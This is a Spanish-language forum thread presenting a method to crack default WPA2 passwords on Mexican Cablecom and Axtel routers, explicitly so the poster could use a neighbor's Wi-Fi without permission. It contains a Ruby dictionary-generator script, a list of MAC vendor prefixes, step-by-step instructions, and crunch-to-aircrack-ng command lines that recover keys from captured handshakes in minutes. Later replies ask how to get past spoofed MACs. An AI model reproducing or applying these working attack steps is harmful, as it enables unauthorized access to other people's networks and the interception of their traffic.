Patron WPA2 cablecomxxxx [MEXICO]

Que tal, bueno les traigo un patron para sacar la contraseña de WPA2 de manera rapida y sencilla, les cuento, hace poco me quede sin internet y como buen usuario, le pedi la contraseña a mi vecino...(Mentira) y este no accedió, así que me tome la molestia de tratar de conseguir la clave, navegando por internet me encontre con un post de un usuario llamado Mackaber, este usuario lo que explica es como sacar la clave de los modems de cablecom y axtel, que cablecom en su mayoría esta usando la marca UBEE, sin mas les contare de manera resumida lo que dice Mackaber, el buscando mas acerca del router, encontro que los primero 6 dígitos de la MAC estaban registrados en la IEEE, el con la base de datos de las MAC programo un algoritmo para tener un DICCIONARIO y asi poderle hacer un ataque por diccionario después de obtener el handshake, supongo que no me estoy explicando muy bien, pero cuando lleguemos a lo practico lo entenderán mejor, lo que el dedujo fue que para obtener el password WPA2 por defecto, se utilizaban el 2 y 3 par de dígitos de la MAC ejemplo
XX:2F:A5:XX:XX, despues se usaba un par de numeros hexadecimales y por ultimo el nombre de la red.
Ejemplos reales:

MAC: 00:14:A4:00:01:23
SSID: Cablecom0123

Con esos datos conocemos un 80% la contraseña ya que usamos el segundo y tercer par de digitos de la mac para la contraseña, entonces queda de esta manera:
14A4XXXXXX

Con el nombre de la red tenemos lo siguiente:

14A4XX0123

Ahora solo queda decifrar el par de XX que es un par en hexadecimal

es muy simple y rapido si creamos un diccionario en vez de hacerle brute force y lo obtenemos en menos de 5 MIN

este es el codigo que programo Mackaber para hacer el diccionario:

# For CablecomXXXX Routers (and probably others from Ubee)
# By Mackaber
# USE $ruby cablecomlistgen.rb "XXXX"

def makelist(suffix)
# Hon Hai prefixes taken from http://standards.ieee.org/develop/regauth/oui/oui.txt
keys = []
prefixes = []
File.readlines("hwlist.txt").each do |l|
prefixes.push(l[0..5])
end
prefixes.each do |pre|
for i in 0..255 do
keys.push("#{pre[2..-1]}#{i.to_s(16).upcase.rjust(2,"0")}#{suffix}")
end
end

keys.each do |key|
puts key
#File.write('file.txt', key+"\n")
File.open('file.txt', 'a') do |file|
file.puts key
end
end


end

makelist(ARGV[0])
aca la base de datos de acuerdo a la mac,

0014A4  (base 16)      Hon Hai Precision Ind. Co., Ltd.
0029AF
0016CE  (base 16)      Hon Hai Precision Ind. Co., Ltd.
0016CF  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00197D  (base 16)      Hon Hai Precision Ind. Co., Ltd
00197E  (base 16)      Hon Hai Precision Ind. Co., Ltd
001C25  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
001C26  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
001DD9  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
001E4C  (base 16)      Hon Hai Precision Ind.Co., Ltd.
001F3A  (base 16)      Hon Hai Precision Ind.Co., Ltd.
001FE1  (base 16)      Hon Hai Precision Ind. Co., Ltd.
001FE2  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002268  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002269  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00234D  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00234E  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00242B  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
00242C  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002556  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00265C  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
00265E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0071CC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
083E8E  (base 16)      Hon Hai Precision Ind.Co.Ltd
08EDB9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0C6076  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0C84DC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0CEEE6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
142D27  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
18F46A  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
1C3E84  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
1C666D  (base 16)      Hon Hai Precision Ind.Co.Ltd
2C8158  (base 16)      Hon Hai Precision Ind. Co.,Ltd
300ED5  (base 16)      Hon Hai Precision Ind.Co.Ltd
342387  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
3859F9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
3C77E6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
4437E6  (base 16)      Hon Hai Precision Ind.Co.Ltd
485AB6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
4C0F6E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
506313  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
543530  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
5C6D20  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
5CAC4C  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
60D819  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
60F494  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
642737  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
689423  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
70188B  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
785968  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
78DD08  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
78E400  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
7CE9D3  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8056F2  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8096CA  (base 16)      Hon Hai Precision Ind Co.,Ltd
844BF5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
889FFA  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8C7CB5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90004E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9034FC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90489A  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
904CE5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
906EBB  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90FBA6  (base 16)      Hon Hai Precision Ind.Co.Ltd
9439E5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9C2A70  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9CAD97  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9CD21E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
A41731  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
B01041  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
B8763F  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
BC8556  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0143D  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C01885  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0CB38  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0F8DA  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C417FE  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C44619  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
CCAF78  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
D02788  (base 16)      Hon Hai Precision Ind.Co.Ltd
D87988  (base 16)      Hon Hai Precision Ind. Co., Ltd.
E006E6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
E4D53D  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
EC55F9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F07BCB  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F0F002  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F4B7E2  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F80D43  (base 16)      Hon Hai Precision Ind. Co., Ltd.
F82FA8  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F866D1  (base 16)      Hon Hai Precision Ind. Co., Ltd.

La lista completa esta aca
You are not allowed to view links. Register or Login,

Pero no hace falta tener toda una lista a menos que lo hagamos a ciegas ya que escaneando la red te das cuenta de la MAC

solo tendrias que crear un diccionario para obtener ese par de numero hexadecimales y conociendo el nombre de la red

el post entero esta You are not allowed to view links. Register or Login

Lo probe y de verdad funciona, me tomo 5 min para sacar la contraseña, no se si me explique bien, ya que lo hice de manera rapida.

Saludos!

Que pena no aplique a los routers de Argentina. Hace un tiempo busque este tipo de patron, pero es muy poca la info que encontré.
Muchisimas gracias por el aporte rush!!

Te dejo +c0in

Saludos!
ANTRAX

hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias

hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias

Mira la entrada nuevamente y lee! campeon que si no entendiste pregunta ahi se tiene un codigo en Python.

Regards,
Snifer

You are not allowed to view links. Register or Login

hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias

Mira la entrada nuevamente y lee! campeon que si no entendiste pregunta ahi se tiene un codigo en Python.

Regards,
Snifer

Es Ruby

Saludos.

hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias

Es facil instala ruby

You are not allowed to view links. Register or Login

copia el codigo de arriba y guardalo como .rb guardalo en una carpeta C:/ruby

crea un archivo con la MAC de tu router, en elemplo de arriba usaria 00:14:A4 y guardalo en un archivo llamado hwlist.txt en la misma carpeta C:/ruby

tiene que quedar de esta manera


ahora abre una cmd y escribe cd C:/ruby

y ejecuta el codigo ruby


y generara el diccionario, se creara un archivo llamado file.txt


ahora solo tendras que concatenar al ultimo de cada string el nombre de la red

14A400nombredelared

EJEMPLO: si la red se llama SSID: Cablecom0123 tendras que poner 0123

14A4000123

en todas las listas del archivo list.txt

así tendrias listo tu diccionario, cuando tengas el handshake podras hacerle brute force y tendras la contraseña en menos de 1 min.

saludos

  Gracias por dar a conocer este trabajo 
Para decifrar las llaves podemos hacerlo también directamente con crunch.
La ventaja es que Crunch está escrito en C y es mucho más rápido que perl a la hora de generar cadenas.

 1) Si queremos descifrar una red AXTEL-XXXX "al vuelo" (sin guardar diccionario)
crunch 8 8 1234567890ABCDEF + + + -t @@@@XXXX | aircrack-ng  /ruta/fichero/captura/handhsake_axtel.cap -e AXTEL-XXXX -w- En lugar de los XXXX debemos poner los 4 dígitos hexadecimales del eSSID en su orden (AXTEL-XXXX)
 
  2) Si queremos descifrar una red CablecomXXXX
crunch 10 10 1234567890ABCDEF + + + -t [email protected]@YYYY  | aircrack-ng  /ruta/fichero/captura/handhsake_cable.cap -e CablecomYYYY -w-  En lugar de los XXXX pondremos los dígitos 3,4,5 y 6 del bSSID
  En lugar de los YYYY pondremos los 4 dígitos hexadecimales del eSSID (CabelcomYYYY)

  En ambos casos sería conociendo el eSSID por defecto (el dueño del PA no ha cambiado el nombre de la red)
El crack es literalmente inmediato con redes cablecom (256 posibilidades) y no demorará más de dos minutos con las CPU las más débiles en el caso de axtel
  (65536 posibilidades)

  Gracias por dar a conocer este trabajo 
Para decifrar las llaves podemos hacerlo también directamente con crunch.
La ventaja es que Crunch está escrito en C y es mucho más rápido que perl a la hora de generar cadenas.

 1) Si queremos descifrar una red AXTEL-XXXX "al vuelo" (sin guardar diccionario)

Code: You are not allowed to view links. Register or Login

crunch 8 8 1234567890ABCDEF + + + -t @@@@XXXX | aircrack-ng  /ruta/fichero/captura/handhsake_axtel.cap -e AXTEL-XXXX -w- En lugar de los XXXX debemos poner los 4 dígitos hexadecimales del eSSID en su orden (AXTEL-XXXX)
 
  2) Si queremos descifrar una red CablecomXXXX

Code: You are not allowed to view links. Register or Login

crunch 10 10 1234567890ABCDEF + + + -t [email protected]@YYYY  | aircrack-ng  /ruta/fichero/captura/handhsake_cable.cap -e CablecomYYYY -w-  En lugar de los XXXX pondremos los dígitos 3,4,5 y 6 del bSSID
  En lugar de los YYYY pondremos los 4 dígitos hexadecimales del eSSID (CabelcomYYYY)

  En ambos casos sería conociendo el eSSID por defecto (el dueño del PA no ha cambiado el nombre de la red)
El crack es literalmente inmediato con redes cablecom (256 posibilidades) y no demorará más de dos minutos con las CPU las más débiles en el caso de axtel
  (65536 posibilidades)

Excelente, ahora que llegue a casa lo probare para ver la efectividad, gracias por el aporte

buenas tardes soy nuevo aquí y quisiera saber si alguien me podría ayudar de favor con este tema ya que he!! intentado tal y como esta explicado y he logrado obtener la contraseña pero de algunos modems y me he dado cuenta que ahora estos modems tienen una mac falsa el cual ya es imposible obtener la pass espero y alguien me pueda ayudar ya que he buscado por infinidad de lugares sin ninguna respuesta a lo que me refiero si hay algún nuevo método o una manera de sacar la mac verdadera de antemano un saludo y gracias por muy buen  foro.